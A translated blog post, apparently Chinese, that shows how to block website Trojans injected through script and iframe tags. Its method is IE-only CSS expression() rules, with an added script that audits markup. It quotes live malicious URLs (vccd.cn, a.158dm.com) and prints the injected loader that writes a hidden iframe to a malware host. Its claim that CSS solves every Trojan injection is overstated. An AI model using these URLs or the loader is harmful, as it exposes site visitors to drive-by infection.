Not long ago, one line of code solved the problem of iframe Trojans planted on websites (including server-side injection, client-side ARP injection, and so on), and many friends approved of it. It really was a good way to keep out the wind and rain. But the way Trojans get planted on web pages has now changed, just as I expected: "script" Trojans are the current fashion. It makes me sweat. I have seen several netizens' websites hit this way, with the following added at the top or bottom of the page:
Attention: the following address contains Trojans, so do not visit it casually:
<script src=http://vccd.cn></script>
What a sweat: N identical <script> tags had been inserted in a row. My computer is fully patched, so I accessed http://vccd.cn directly (or you can download it with Thunder), and this is what came back:
document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
I also used Thunder to download the file http://a.158dm.com/b1.htm. At first glance it was a mess of encoded JS, but I spotted a number that looked like a QQ number and looked it up directly. It led to an organization that specializes in providing web Trojans. What a world. Their fees are quite high!
...
var Kfqq, Qqs="784378237"; qwfgsg="LLLL\XXXXXLD"; Kfqq = Qqs;
(...omitted) (N lines of statistics JS code follow)
I can't just stand by and ignore a situation like this, so I had to think of something. I had a bowl of mung bean porridge with plenty of sugar, which was delicious, and a way came to me. A little analysis gave the answer. Let's look at the characteristics of a <script> Trojan:
<script src=http://vccd.cn></script>
Note that the src of a script Trojan is generally on a foreign domain, that is, the src starts with http. A script on your own website generally does not need the http prefix. Looking at what the Trojan really does, it still ends up outputting an iframe, JS code or <object> code; however many of them come, we kill them all.
Write the CSS with me and take them out one by one. I wrote 5 different solutions. Let's test them:
Solution 1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/* This line deals with planted IFRAME Trojans */
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('The Trojan was successfully isolated!'):'');}
Principle: Take the src of the <script> tag, convert it to lowercase, and check whether it starts with "http". If it does, the script is a JS file from an external domain, so the page content is cleared and "The Trojan was successfully isolated!" is written. Otherwise, the page displays normally.
Disadvantages: Visitors cannot see pages that have been infected with <script> Trojans.
Solution 2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
Principle: Use document.close() to forcibly close the document.write() of the external-domain JS file. The Trojan content has no time to finish writing: only the part already buffered is output, and the rest is never written.
Solution 3:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');}
Principle: When a JS file from an external domain is encountered, IE's private execCommand method is called immediately to stop all requests for the page, so any later JS files from external domains are also forced to stop downloading. It is like clicking the browser's "Stop" button. It seems this is a way for JS to simulate the IE stop button.
Solution 4:
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}
script{noj4s:expression((this.src.indexOf('http')==0)?this.src='res://ieframe.dll/dnserror.htm':'');}
Principle: Rewrite the src of the external-domain JS file to the address of IE's local 404 error page, so the JS code from the external domain is never downloaded.
Solution 5:
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')!=0)?document.write('The Trojan was successfully isolated!'):'');}/* A script whose id does not start with "lh" is treated as injected */
In the fifth solution, every <script> tag in the page's own HTML source must be given an id prefixed with "lh", such as lhWeatherJSapi: <script src="***/**.js" id="lhSearchJSapi"></script>
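An added example (not the author's code) that applies the article's two tests, a src beginning with http and the Solution 5 id prefix, to saved page markup so a site owner can audit HTML for injected tags. The sample page, the function names and the example.invalid hosts are constructed for illustration; it also reports protocol-relative `//host` sources, which the `indexOf('http')==0` test does not match.

```javascript
// Added example: audits markup with the two heuristics from the article.
// SAMPLE_PAGE is constructed; the example.invalid hosts are placeholders.
const SAMPLE_PAGE = `
<html><body>
<script src="js/1.js" id="lhSiteJSapi"></script>
<script src=http://injected.example.invalid></script>
<SCRIPT SRC='HTTP://injected.example.invalid/a.js'></SCRIPT>
<script src="//injected.example.invalid/b.js"></script>
<script id="lhInline">var x = 1;</script>
<iframe src=http://injected.example.invalid/b1.htm width=0 height=0></iframe>
</body></html>`;

// Read one attribute from a tag's text; handles "x", 'x' and unquoted values.
function attr(tag, name) {
  const re = new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : '';
}

// Classify every <script> and <iframe> opening tag found in the markup.
function auditMarkup(html, idPrefix = 'lh') {
  const findings = [];
  for (const [tag, el] of html.matchAll(/<(script|iframe)\b[^>]*>/gi)) {
    const isScript = el.toLowerCase() === 'script';
    const src = attr(tag, 'src').trim();
    const id = attr(tag, 'id');
    const lower = src.toLowerCase();
    const reasons = [];
    if (!isScript) reasons.push('iframe');                              // iframe rule shared by all five solutions
    if (lower.indexOf('http') === 0) reasons.push('absolute-src');      // test used by Solutions 1-4
    if (lower.startsWith('//')) reasons.push('protocol-relative-src');  // not matched by the http test
    if (isScript && id.toLowerCase().indexOf(idPrefix) !== 0)
      reasons.push('id-not-allowlisted');                               // Solution 5 id prefix
    findings.push({ tag, src, id, reasons });
  }
  return findings;
}

// Only the tags that at least one heuristic flags.
function suspicious(html) {
  return auditMarkup(html).filter(f => f.reasons.length > 0);
}
```

Unlike the CSS `expression()` rules, which only Internet Explorer evaluates, this check runs under Node.js against the markup as served.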
The following page code contains a Trojan address, and the Trojan is repeated 6 times on the page. Please test it with the different solutions described above and see how my research holds up! (This test is dangerous; be sure to apply all patches before testing.)
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
CSS code that quickly terminates the JS Trojan process
I am the 1 of the page itself
I am the 2 of the page itself
I am the page itself3
1.js belongs to my own website:
document.write("I am the JS file of this website");
document.write("
");
My test environment is Windows XP SP2 and Windows Vista SP1 with IE6/IE7/IE8, all fully patched.
In summary, all of the current ways of planting Trojans have been cracked. All Trojan-planting problems can be solved with CSS, and visitors will no longer be easily infected.
Please also study my code carefully to see whether it has any bugs. If it does, be sure to raise them so the problems can be fixed! And if you have other, better methods, let's discuss them.